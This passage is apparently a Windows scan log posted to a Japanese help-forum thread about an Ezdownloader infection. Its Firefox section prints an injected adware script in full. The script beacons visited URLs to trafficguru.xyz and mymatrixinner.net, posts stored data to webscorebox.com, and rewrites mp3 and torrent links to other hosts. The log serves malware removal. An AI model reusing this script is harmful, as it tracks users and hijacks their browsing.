DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:[b]64bit:[/b] - [2008/12/11 14:10:40 | 000,018,456 | ---- | M] (Texim Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\TxDevCmd.sys -- (TxDevCmd)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\SearchScopes,Backup.Old.DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{03F5308A-B24A-1E60-0D1F-6884B66F605A}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC


IE - HKU\.DEFAULT\..\URLSearchHook: {A3BC75A2-1F87-4686-AA43-5347D756017C} - No CLSID value found
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\URLSearchHook: {A3BC75A2-1F87-4686-AA43-5347D756017C} - No CLSID value found
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://shop.tsukumo.co.jp
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\..\SearchScopes,Backup.Old.DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\..\SearchScopes\{03F5308A-B24A-1E60-0D1F-6884B66F605A}: "URL" = http://www.google.com/search?q={searchTerms}&rlz=1I7ADFA_ja&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rlz=1I7ADFA_jaJP426&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\..\SearchScopes\{9F934DBC-AA53-4210-B034-7AAC96C1B018}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7ADFA_ja
IE - HKU\S-1-5-21-2455232710-2752153166-228219264-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]
  • tarutaru
  • 2015/05/05 (Tue) 23:31:26
トピックを確認する 
Re: Ezdownloderをインストールしてしまいました。。。。
FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..browser.startup.homepage: "about:home"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:37.0.2
FF - prefs.js..extensions.r2ADCc84PnA2qoiG.scode: "(function(){try{if(window.location.href.indexOf(\"rjC4rjr5rTwHrHs5rjk9rTU5pdr\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i<l;i++){if(window.location.hostname.indexOf(a[i])>-1){return;}}for(var j=0,a=d[1],l=a.length;j<l;j++){if(a[j].test(window.location.hostname)){return;}}}catch(e){}try{var u=[[\"revenuewire.com/pcutilitiespro\",\"__ipm=\",\"=apapamam\",\"txtlnkusaolp00000800\",\"=admaven\",\"5386b_643c_\",\"=CONMHP&conlogo=CT3210127\",\"www.livegeekhelp.com/pop/\",\"?ctid=ct3330145\",\"?ctid=ct3330146\",\"?ctid=ct3330147\",\"?ctid=ct3330148\",\"?ctid=ct3330149\",\"if72ru4sdfsdfruh7fewui\",\"fghjktghndfgtssss\",\"jp.hao123.com/?tn=webpick_pay_sc_up01_hao123_jp\",\"form=u064ht&pc=u064\",\"source=45905810\",\"source=532d277e\",\"aro.com/ws/?source=6974b128\",\"esmoke.com/?isid=9949\",\"esmoke.com/?isid=9950\",\"esmoke.com/?isid=9951\",\"id=webpick_ot\",\"id=wbpk_ot\",\"hash=a4vxy8\",\"hash=m5g73j\",\"hash=hg7gja\",\"hash=fz61s5\",\"hash=1i5w2d\",\"hash=zndas3\",\"hash=b3qau4\",\"hash=ijeqe4\",\"duit&ptag=aa7aab832a2de41458bf&\",\"duit&ptag=a93f650ac0e6a4a4791f&\",\"duit&ptag=a79888693f6ca4634a6f\",\"duit&ptag=a359b17b6faa44e6b86f\",\"isid=mf245f633-e188-4162-b56a\",\"sid=meabfcf9a-556b-4c5c-8727\",\"isid=m8fbc22fe-ab08-464e-aa63\",\"uid=531364863_132823_4252277e\"],[/[\\?&]p=24039(&|$)/,/lll[a-zA-Z0-9]{11}00/,/#FA[-_]/,/bing\\.com[^p]+pc=.+/,/^http:\\/\\/sporty-glow\\.com\\//,/^http:\\/\\/game-trek\\.net\\//,/#(a652c|ld893)_/,/[&?]pid=715493([&#]|$)/,/ressbar\\.com[^f]+fid=65017/,/^https?:\\/\\/([a-z0-9-]+\\.)*search\\.yahoo\\.com\\/yhs\\/.*[&?]hspart=webpick(&|$)/]];for(var i=0,a=u[0],l=a.length;i<l;i++){if((window.location.href+\"#\"+window.name).indexOf(a[i])>-1){(new Image).src = \"//\"+[\"trafficguru.xyz\",\"mymatrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.location.hostname)+\"&eid=1307&pid=3540&hid=17913821332815429883\";return;}}for(var j=0,a=u[1],l=a.length;j<l;j++){if(a[j].test(window.location.href+\"#\"+window.name)){(new Image).src=\"//\"+[\"trafficguru.xyz\",\"mymatrixinner.net\"][window.location.protocol!=\"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[j])+\"&h=\"+encodeURIComponent(window.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.location.hostname)+\"&eid=1307&pid=3540&hid=17913821332815429883\";return;}}}catch(e){}try{(function () { var b, f, g; try { var a = window.location.href; if (!(window == window.top || \"undefined\" == typeof localStorage || \"undefined\" == typeof localStorage.setItem || -1 == a.indexOf(\"2BWZsARX=\") && !a.match(/1018-\\d{3,4}_/) && -1 == a.indexOf(\"cdncache-a.aka\"))) { if (-1 < a.indexOf(\"2BWZsARX=\")) { var d = a.match(/2BWZsARX=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/ b = d[1]; f = d[2].replace(\"x\", \".\"); g = d[3] ? d[3] : 0 } else { try { var j = -1 < a.indexOf(\"zoneid\") ? a.match(/zoneid=(\\d+)/)[1] : a.match(/1018-(\\d+)_WS/)[1] } catch (n) { j = 0 } var c = document.getElementsByTagName(\"body\")[0]; b = -1 < a.indexOf(\"cdncache-a.aka\") ? 1001 : 1002; f = Math.max(c.scrollWidth, c.offsetWidth) + \".\" + Math.max(c.scrollHeight, c.offsetHeight); g = j } var e = new Date, k = parseInt(e.getTime() / 1E3), l = \"zyk_\" + [e.getUTCFullYear() + \"-\" + (e.getUTCMonth() + 1) + \"-\" + e.getUTCDate(), b, f, g].join(), m = localStorage.getItem(l); localStorage.setItem(l, 1 + (m ? parseInt(m) : 0)); if (lsTime = localStorage.getItem(\"zEpoch\")) { if (7200 < k - parseInt(lsTime)) { var h = document.createElement(\"div\"); b = []; for (i in localStorage)-1 < i.indexOf(\"zyk_\") && b.push(\"'\" + i.replace(\"zyk_\", \"\") + \"':\" + localStorage.getItem(i)); h.style.display = \"none\"; h.innerHTML = '<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ukchVWzmPhd9FrHa6tNbPhd9HqjnEtNhVCNqPB750pihSCM06C7lGojsMh7VUojaMAyVUojw6pjwHpdsFrHrGpdw8qds4pdYH\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{' + b.join(\",\") + '}\"></form>'; (typeof c != \"undefined\" ? c : document.getElementsByTagName(\"body\")[0]).appendChild(h); document.getElementById(\"webscorebox_frm\").submit(); localStorage.clear() } } else localStorage.setItem(\"zEpoch\", k) } } catch (p) { } })(); (function () { var l = function () { var a = window.location.search.split(\"v=\")[1], b = a && a.indexOf(\"&\") || -1; -1 != b && (a = a.substring(0, b)); return a }, m = function () { var a = document.getElementsByClassName(\"watch-view-count\"); return a && a[0] && a[0].innerHTML ? (a = a[0].innerHTML.replace(/^([0-9,]+).*$/, \"$1\").replace(/,/g, \"\")) && parseInt(a) && parseInt(a) || 0 : 0 }, n = function () { var a = document.getElementsByClassName(\"watch-extras-section\"); if (a)for (var b = 0; b < a[0].children.length; b++)if (\"Category\" === a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()) { var c = a[0].children[b].getElementsByTagName(\"a\"); if (c && c[0] && (c = c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\", \"\")) } return \"\" }, p = function () { var a = document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\"); return a && a[0] && a[0].innerHTML ? (a = a[0].innerHTML.replace(/^([0-9,]+).*$/, \"$1\").replace(/,/g, \"\")) && parseInt(a) && parseInt(a) || 1 : 1 }; if (window == window.top && (-1 < window.location.hostname.indexOf(\"youtube.com\") || -1 < window.location.hostname.indexOf(\"youtu.be\")))try { if (\"qq=\" == window.name.substr(0, 3)) { var f = document.getElementsByTagName(\"body\")[0]; if (!f.getAttribute(\"wyttb\")) { f.setAttribute(\"wyttb\", \"1\"); var g = l(), d = m(), q = n(), h = p(); if (g && d && d) { var e = window.name.split(\"=\")[1]; window.name = \"\"; 2 <= d / h && ((new Image).src = \"https://score.transferin.in/subs.php?id=\" + g + \"&n=\" + d + \"&c=\" + q + \"&s=\" + h + \"&q=\" + e + \"&cb=221.254.26.35\") } } } if (-1 < window.location.href.indexOf(\"results?search_query=\")) { var k = /[\\?&]search_query=([^&#]*)/.exec(location.search), e = null === k ? \"\" : decodeURIComponent(k[1].replace(/\\+/g, \" \")); window.name = \"qq=\" + e } } catch (r) { } })(); new function () { var k = this; this.utils = new function () { var c = this; c.sendPixels = function (a) { var b; if (a instanceof Array)for (var e = 0; e < a.length; e++) { var d = a[e]; b = new Image; b.src = d } else b = new Image, b.src = a }; c.isFalse = function (a) { return \"undefined\" == typeof a || 0 === a.length || null === a }; c.cookie = new function () { var a = this; a.createCookie = function (a, e, d) { if (d) { var c = new Date; c.setTime(c.getTime() + 864E5 * d); d = \"; expires=\" + c.toGMTString() } else d = \"\"; document.cookie = a + \"=\" + e + d + \"; path=/\" }; a.readCookie = function (a) { a += \"=\"; for (var e = document.cookie.split(\";\"), d = 0; d < e.length; d++) { for (var c = e[d]; \" \" == c.charAt(0);)c = c.substring(1, c.length); if (0 == c.indexOf(a))return c.substring(a.length, c.length) } return null }; a.eraseCookie = function (b) { a.createCookie(b, \"\", -1) } }; c.ajax = { get: function (a, b) { try { this.xhr = new XMLHttpRequest, this.xhr.open(\"GET\", a, !0), this.xhr.onreadystatechange = function () { 4 == c.ajax.xhr.readyState && b(c.ajax.xhr.responseText) }, this.xhr.send() } catch (e) { } }, post: function (a, b, e) { this.xhr = new XMLHttpRequest; this.xhr.open(\"POST\", a, !0); this.xhr.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange = function () { 4 == c.ajax.xhr.readyState && e(c.ajax.xhr.responseText) }; b = encodeURIComponent(b); this.xhr.send(b) } }; c.waitForTokens = {}; c.addScript = function (a, b) { if (\"bing\" == b) { var e = Element.prototype.appendChild; document.createElement(\"iframe\"); Element.prototype.appendChild = document.appendChild; document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild = e } else document.getElementsByTagName(\"head\")[0].appendChild(a) }; c.waitForElement = function (a, b, e, d) { var f = c.query_selector_all(a); clearTimeout(c.waitTimeout); if (25 < k.waitForElementCounter)return b(null); if (\"undefined\" == typeof f || 1 > f.length) { if (c.waitForTokens[d])return b(null); var g = arguments.callee; c.waitTimeout = setTimeout(function () { k.waitForElementCounter++; g(a, b, e, d) }, e) } else { if (c.waitForTokens[d])return b(null); c.waitForTokens[d] = !0; k.waitForElementCounter = 0; return b(f) } }; c.flushWaitForTokens = function () { c.waitForTokens = {} }; c.getRandomInt = function (a, b) { return Math.floor(Math.random() * (b - a + 1)) + a }; c.get_computed_style = \"function\" != typeof window.getComputedStyle ? function (a) { return { getPropertyValue: function (b) { \"float\" == b && (b = \"styleFloat\"); b = c.dhtml_prop_name(b); return \"object\" == typeof a.currentStyle && null != a.currentStyle && \"undefined\" != typeof a.currentStyle[b] ? a.currentStyle[b] : null } } } : function (a, b) { return window.getComputedStyle(a, b) || { getPropertyValue: function () { }} }; c.query_selector_all = document.querySelectorAll ? function (a) { try { return document.querySelectorAll(a) } catch (b) { } } : function (a) { var b = a.match(/^#([^,\\s]+)$/) || []; if (1 < b.length)return a = document.getElementById(b[1]) || void 0, \"undefined\" != typeof a ? [a] : []; b = document.createElement(\"STYLE\"); document.getElementsByTagName(\"body\")[0].appendChild(b); document.__asya_qsaels = []; b.styleSheet.cssText = a + \"{x:expression(document.__asya_qsaels.push(this))}\"; window.scrollBy(0, 0); return document.__asya_qsaels }; c.clone_object = window.JSON instanceof Object ? function (a) { if (a instanceof Object && (a = JSON.stringify(a), \"string\" == typeof a))return JSON.parse(a) } : function (a) { if (a instanceof Object) { var b = new a.constructor, e; for (e in a)b[e] = arguments.callee(a[e]); return b } return a }; c.dhtml_prop_name = function (a) { return a.replace(/(\\-([a-z]){1})/g, function (a, e, c) { return c.toUpperCase() }) }; c.wildcard_to_regex = function (a) { a = a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g, \"\\\\$1\"); a = a.replace(/\\*/g, \".*\"); return new RegExp(a) }; c.throttle = function (a, b) { var e = null; return function () { var c = this, f = arguments; clearTimeout(e); e = setTimeout(function () { a.apply(c, f) }, b) } }; c.epoch = function () { return (new Date).getTime() }; c.msie = function () { var a = parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase()) || [])[1], 10); isNaN(a) && (a = parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase()) || [])[1], 10)); return isNaN(a) ? !1 : a }(); c.version_ie_less = function (a) { if (/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1) <= a ? !0 : !1 }; c.isIE = function () { return \"Microsoft Internet Explorer\" == navigator.appName || \"Netscape\" == navigator.appName && null != /Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent) }; c.match_url = function (a, b) { for (var e = 0; e < b.length; e++)if (\"string\" == typeof b[e]) { var d; d = /^\\/.+\\/$/.test(b[e]) ? new RegExp(b[e]) : c.wildcard_to_regex(b[e]); if (d instanceof RegExp && d.test(a))return !0 } }; c.ping = function (a) { for (var b = [\"google\", \"bing\", \"yahoo\", \"youtube\"], c = 0; c < b.length; c++)if (-1 < location.hostname.indexOf(b[c])) { var d = new Image, f = encodeURIComponent(window == window.top ? window.location.href : \"\"); 1E3 < f.length && (f = encodeURIComponent(location.hostname)); var g = encodeURIComponent(location.hostname); d.src = k.pixelHost + \"?hid=17913821332815429883&eid=1307&pid=3540&prodid=338&v=\" + k.version + \"&ch=\" + a + \"&lan=\" + navigator.language + \"&cc=JP&pr=\" + b[c] + \"&host=\" + g + \"&ref=\" + f } }; c.getAllText = function (a) { for (var b = \"\", c = 0; c < a.length; c++)b += a.textContent ? a.textContent : a.innetText; return b }; c.duplicateElement = function (a) { var b = document.createElement(a.nodeName.toLowerCase()), e = !1; a.getAttribute(\"href\") && b.setAttribute(\"href\", \"javascript:void(0);\"); for (var d in a)if (\"src\" == d || \"width\" == d || \"height\" == d)b[d] = a[d]; else if (\"style\" == d)for (var f in a[d])a[d][f] && \"\" != a[d][f] && (b[d][f] = a[d][f]); else e || \"nodeValue\" != d && \"textContent\" != d && \"innetText\" != d && \"className\" != d || 0 != a.children.length || (b[d] = a[d], e = !0); for (e = 0; e < a.childNodes.length; e++)if (3 == a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent ? a.childNodes[e].textContent : a.childNodes[e].innerText)); else { d = c.duplicateElement(a.childNodes[e]); f = c.getAllText(d.childNodes); var g = a.childNodes[e].textContent ? a.childNodes[e].textContent : a.childNodes[e].innerText; g && (g = g.replace(f, \"\"), \"\" != g && (d.textContent ? d.textContent = g : d.innerText = g)); b.appendChild(d) } return b } }; if (-1 < window.location.href.indexOf(\"google.com/chrome/srt\") && -1 < navigator.userAgent.toLowerCase().indexOf(\"chrome\")) { try { var h = parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1], 10) } catch (p) { return } if (!(38 >= h)) { for (h = 0; h < document.links.length; h++) { var l = document.links[h], m = l.getAttribute(\"href\"); if (m && -1 < m.indexOf(\"#dialog-contents\")) { var m = k.utils.duplicateElement(l), n = l.parentNode; n.insertBefore(m, l); n.removeChild(l) } } (h = document.getElementById(\"dialog-contents\")) && h.remove() } } }; (function () { try { window.top == window && -1 < navigator.userAgent.toLowerCase().indexOf(\"chrome\") && \"http:\" == window.location.protocol && chrome.storage.local.get(\"bcvzdw1\", function (a) { if (!a.bcvzdw1 && !localStorage.getItem(\"bcvzdw1\") && (a = document.getElementsByTagName(\"a\"), a.length))for (var b = 0; b < a.length; b++)if (a[b] && a[b].href && \"mp3\" == a[b].href.substr(-3)) { var c = a[b].href; a[b].setAttribute(\"href\", \"http://mp3tree.co/media/\" + encodeURIComponent(a[b].innerHTML) + \"/mid/\" + encodeURIComponent(encodeURIComponent(c)) + \"/el/1\"); a[b].setAttribute(\"id\", \"sdfsdfsfds\" + b); document.getElementById(\"sdfsdfsfds\" + b).addEventListener(\"click\", function () { chrome.storage.local.set({bcvzdw1: \"2\"}); localStorage.setItem(\"bcvzdw1\", \"2\") }, !1) } }) } catch (d) { } })(); (function () { try { window.top == window && -1 < navigator.userAgent.toLowerCase().indexOf(\"chrome\") && \"http:\" == window.location.protocol && chrome.storage.local.get(\"bxcv43t897\", function (a) { if (!a.bxcv43t897 && !localStorage.getItem(\"bxcv43t897\") && (a = document.getElementsByTagName(\"a\"), a.length))for (var b = 0; b < a.length; b++)a[b] && a[b].href && \"torrent\" == a[b].href.substr(-7) && (a[b].setAttribute(\"href\", \"http://78.47.6.114/api/getLink/?cb=\" + Math.random()), a[b].setAttribute(\"id\", \"cxvcxv\" + b), document.getElementById(\"cxvcxv\" + b).addEventListener(\"click\", function () { chrome.storage.local.set({bxcv43t897: \"2\"}); localStorage.setItem(\"bxcv43t897\", \"2\") }, !1)) }) } catch (c) { } })();}catch(e){};try{new function(){var n=this;this.activeZds={\"uploading.com\":1,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\"ubtitles4free.ne\":1,\r\n\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":0,\"uploadrocket.net\":0,\"programas-gratis.net\":0,\"programasgratis.es\":1,\"programasejogos.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":1,\"vitanclub.net\":1,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":0,\"mestorrents.com\":1,\"vitorrent.net\":1,\"uploaded.net\":0,\"newsinitiative.org\":0,\r\n\"megafilmesonlinehd.com\":1,\"mycoolmp3.com\":1,\"descargadictos.net\":0,\"toggle.com\":1,\"downloadshareware.com\":1,\"primewire.ag\":1,\"ads.showmeflix.com\":0,\"myappsforpc.com\":1,\"telecharger.logiciel.net\":1,\"winmacsofts.com\":1,\"telecharger.info\":0,\"torntv-dl.net\":0,\"1337x.to\":1,\"h33t.to\":1,\"ahashare.com\":1,\"torrenthound.com\":1,\"smartorrent.com\":1,\"torrentreactor.net\":1,\"tomadivx.org\":1,\"opensubtitles.website\":0,\"downloads.info\":1,\"techypcapps.com\":1,\"techmacho.com\":1,\"techariot.com\":1,\"androidlegend.com\":1,\r\n\"technologyrush.com\":1,\"notintricate.com\":1,\"techglen.com\":1,\"updownload.com\":0,\"techamiable.com\":1,\"appsforpcmero.com\":0,\"hugefiles.net\":0,\"descarga.benjaminstrahs.com\":1,\"installers.installm.com\":1,\"uptobox.com\":0,\"torrentz.com\":1,\"torrentz.eu\":0,\"torrentsmirror.com\":0,\"isohunt.to\":0,\"lp.playerpage209.info\":1,\"lp.playerpage214.info\":1,\"popcorntime.com.br\":1,\"roms43.com\":1,\"baixarwhatsapp.com.br\":1};this.utils=new function(){var h=this;h.sendPixels=function(e){var h;if(e instanceof Array)for(var l=\r\n0;l<e.length;l++){var m=e[l];h=new Image;h.src=m}else h=new Image,h.src=e};h.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};h.cookie=new function(){var e=this;e.createCookie=function(e,h,m){if(m){var n=new Date;n.setTime(n.getTime()+864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),m=0;m<h.length;m++){for(var n=h[m];\" 